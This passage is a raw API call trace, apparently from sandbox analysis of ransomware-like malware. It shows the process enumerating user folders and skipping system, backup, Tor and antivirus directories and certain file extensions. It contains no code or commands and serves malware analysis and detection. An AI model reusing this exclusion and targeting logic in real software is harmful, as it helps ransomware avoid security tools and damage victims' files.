lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IS\\") returned 0x49 [0100.449] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf858 [0100.449] CharUpperBuffW (in: lpsz=".mui", cchLength=0x4 | out: lpsz=".MUI") returned 0x4 [0100.449] CharUpperBuffW (in: lpsz="FileSync.LocalizedResources.dll.mui", cchLength=0x23 | out: lpsz="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI") returned 0x23 [0100.449] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0100.449] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.449] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0100.449] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.449] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0100.450] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.450] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0100.451] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0100.452] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0100.452] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0100.452] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0100.452] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0100.452] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0100.452] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0100.452] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0100.452] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.452] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\MICROSOFT ONEDRIVE\\", cchLength=0x14 | out: lpsz="\\MICROSOFT ONEDRIVE\\") returned 0x14 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\GOOGLE\\DRIVE\\", cchLength=0xe | out: lpsz="\\GOOGLE\\DRIVE\\") returned 0xe [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\DROPBOX\\", cchLength=0x9 | out: lpsz="\\DROPBOX\\") returned 0x9 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.453] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0100.453] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\ACROBAT READER", cchLength=0xf | out: lpsz="\\ACROBAT READER") returned 0xf [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\NVIDIA", cchLength=0x7 | out: lpsz="\\NVIDIA") returned 0x7 [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.454] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0100.454] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0100.455] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\", cchLength=0x49 | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.6998.0830\\IT\\") returned 0x49 [0100.455] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cff18 [0100.456] CharUpperBuffW (in: lpsz=".mui", cchLength=0x4 | out: lpsz=".MUI") returned 0x4 [0100.456] CharUpperBuffW (in: lpsz="FileSync.LocalizedResources.dll.mui", cchLength=0x23 | out: lpsz="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI") returned 0x23 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0100.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0100.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0100.457] CompareStringW (Locale=0x400, 